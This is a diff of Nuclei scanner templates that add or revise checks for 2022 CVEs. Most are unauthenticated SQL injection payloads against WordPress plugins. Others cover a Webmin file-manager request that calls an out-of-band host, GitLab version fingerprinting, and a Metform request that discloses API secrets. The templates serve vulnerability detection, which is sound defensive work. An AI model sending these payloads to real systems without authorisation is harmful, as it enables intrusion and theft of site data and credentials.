- "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de"
|
||||
- "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4"
|
||||
- "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f"
|
||||
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
|
||||
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
|
||||
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
|
||||
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
|
||||
- "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df"
|
||||
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
|
||||
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
|
||||
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
|
||||
- "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353"
|
||||
- "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159"
|
||||
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
|
||||
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
|
||||
- "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d"
|
||||
- "a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe"
|
||||
- "a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b"
|
||||
- "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2"
|
||||
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
|
||||
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
|
||||
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
|
||||
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
|
||||
- "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1"
|
||||
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
|
||||
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
|
||||
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
|
||||
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
|
||||
- "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209"
|
||||
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
|
||||
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
|
||||
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
|
||||
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
|
||||
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
|
||||
- "e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488"
|
||||
- "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee"
|
||||
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
|
||||
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
|
||||
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
|
||||
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '(?:application-)(\S{64})(?:\.css)'
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2022-0785
|
||||
|
||||
info:
|
||||
name: WordPress Daily Prayer Time <2022.03.01 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
|
||||
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0785
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0785
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,cve,cve2022,wp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2022-0786
|
||||
|
||||
info:
|
||||
name: KiviCare < 2.3.9 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30
|
||||
- https://wordpress.org/plugins/kivicare-clinic-management-system/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0786
|
||||
classification:
|
||||
cve-id: CVE-2022-0786
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,kivicare-clinic-management-system,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Doctor details")'
|
||||
condition: and
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-0788
|
||||
|
||||
info:
|
||||
name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
|
||||
- https://wordpress.org/plugins/wp-fundraising-donation/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0788
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0788
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "Invalid payment.")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-0817
|
||||
|
||||
info:
|
||||
name: WordPress BadgeOS <=3.7.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
|
||||
- https://wordpress.org/plugins/badgeos/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0817
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- "contains(body, md5(num))"
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "badgeos-arrange-buttons")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
|
@ -0,0 +1,52 @@
|
|||
id: CVE-2022-0824
|
||||
|
||||
info:
|
||||
name: Webmin prior to 1.990 - Improper Access Control to Remote Code Execution
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
|
||||
reference:
|
||||
- https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0824
|
||||
- https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38
|
||||
- https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-0824
|
||||
cwe-id: CWE-284
|
||||
tags: rce,oss,huntr,cve,cve2022,webmin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /session_login.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: redirect=1;testing=1;PHPSESSID=;
|
||||
|
||||
user={{username}}&pass={{password}}
|
||||
|
||||
- |
|
||||
POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: {{RootURL}}/filemin/?xnavigation=1
|
||||
|
||||
link=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Failed to write to /{{ranstr}}/index.html"
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2022-0826
|
||||
|
||||
info:
|
||||
name: WP Video Gallery <= 1.7.1 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5
|
||||
- https://wordpress.org/plugins/wp-video-gallery-free/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0826
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0826
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Registred videos :")'
|
||||
condition: and
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2022-0867
|
||||
|
||||
info:
|
||||
name: WordPress ARPrice <3.6.1 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
|
||||
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0867
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0867
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_1>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(content_type_1, "text/html")'
|
||||
- 'contains(body_2, "ArpPriceTable")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
|
@ -30,6 +30,7 @@ requests:
|
|||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
- "<!DOCTYPE html"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-0948
|
||||
|
||||
info:
|
||||
name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
|
||||
- https://wordpress.org/plugins/woc-order-alert/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0948
|
||||
- https://plugins.trac.wordpress.org/changeset/2707223
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0948
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /?rest_route=/olistener/new HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
content-type: application/json
|
||||
|
||||
{"id":" (SLEEP(6))#"}
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_1>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(content_type_1, "application/json")'
|
||||
- 'contains(body_2, "olistener-action.olistener-controller")'
|
||||
condition: and
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1007
|
||||
|
||||
info:
|
||||
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
|
||||
name: WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
|
||||
WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
|
||||
- https://wordpress.org/plugins/advanced-booking-calendar/
|
||||
|
@ -42,3 +42,5 @@ requests:
|
|||
- "contains(all_headers_2, 'text/html')"
|
||||
- "status_code_2 == 200"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1057
|
||||
|
||||
info:
|
||||
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
|
||||
name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
|
||||
WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
|
||||
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
|
||||
|
@ -33,3 +33,5 @@ requests:
|
|||
- 'status_code == 500'
|
||||
- 'contains(body, "been a critical error")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-1162
|
||||
|
||||
info:
|
||||
name: GitLab CE/EE - Hardcoded password
|
||||
author: GitLab Red Team
|
||||
severity: critical
|
||||
description: A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
|
||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1162
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-1162
|
||||
cwe-id: CWE-798
|
||||
metadata:
|
||||
shodan-query: http.title:"GitLab"
|
||||
tags: cve,cve2022,gitlab
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/users/sign_in"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa"
|
||||
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
|
||||
- "6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193"
|
||||
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
|
||||
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
|
||||
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '(?:application-)(\S{64})(?:\.css)'
|
|
@ -0,0 +1,59 @@
|
|||
id: CVE-2022-1442
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Metform <= 2.1.3 - Unauthenticated Sensitive Information Disclosure
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
|
||||
reference:
|
||||
- https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf
|
||||
- https://wpscan.com/vulnerability/9f3fcdd4-9ddc-45d5-a4af-e58634813c2b
|
||||
- https://wordpress.org/plugins/metform/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1442
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-1442
|
||||
cwe-id: CWE-862
|
||||
metadata:
|
||||
google-dork: inurl:/wp-content/plugins/metform
|
||||
verified: "true"
|
||||
tags: wpscan,cve2022,wordpress,wp-plugin,disclosure,unauth,metform,cve,wp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- "mf_recaptcha_secret_key"
|
||||
- "admin_email_from"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: id
|
||||
group: 1
|
||||
regex:
|
||||
- '<option value=\"([0-9]+)\"'
|
||||
internal: true
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2022-1595
|
||||
|
||||
info:
|
||||
name: HC Custom WP-Admin URL - 1.4 - Unauthenticated Secret URL Disclosure
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b
|
||||
- https://wordpress.org/plugins/hc-custom-wp-admin-url/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1595
|
||||
classification:
|
||||
cve-id: CVE-2022-1595
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
HEAD /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: valid_login_slug=1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "Location: ([a-zA-Z0-9_.\\/-]+)"
|
||||
- "wordpress_"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue